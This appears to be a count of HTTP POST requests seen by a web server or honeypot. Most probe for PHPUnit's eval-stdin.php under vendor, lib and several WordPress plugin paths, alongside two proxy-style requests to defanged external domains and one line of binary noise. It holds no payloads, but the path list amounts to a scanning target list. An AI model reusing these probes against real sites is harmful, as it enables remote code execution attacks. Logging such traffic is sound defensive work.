3	POST	/lib/phpunit/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
3	POST	/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
3	POST	/lib/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
3	POST	/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
3	POST	/phpunit/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
3	POST	/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
3	POST	/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/sdk	HTTP/1.1
3	POST	/vendor/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
3	POST	/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
4	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
3	POST	/vendor/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
3	POST	/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
3	POST	/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
3	POST	/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//dearth[.]fun/ded6666ab67c53bb0e7f33a76d40ef4a416853d0d4cf5eabeee59425066d6780b3bb7a0a1c175ed53970f777838c1dff5b00712dd75be074707468b039556318471b3f718ca898aa7a09fe4bda91f901d890d50d05d2a904a2ebe584727f9cbb	HTTP/1.1
1	POST	http[:]//zwykle[.]xyz/fd424817430c5ee55abb4f8cae61e77d71b53e047a687f30a51df9feac7a51dc599fd73d9d85876f8677f62c32d9166bc2448c3e9dd71df9d061e2c28485468e89ce5f9d6759634dd71dc87fdcb3ebe4a3ba5a2077cf0993a9d82587a903f4dc	HTTP/1.1
1		\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf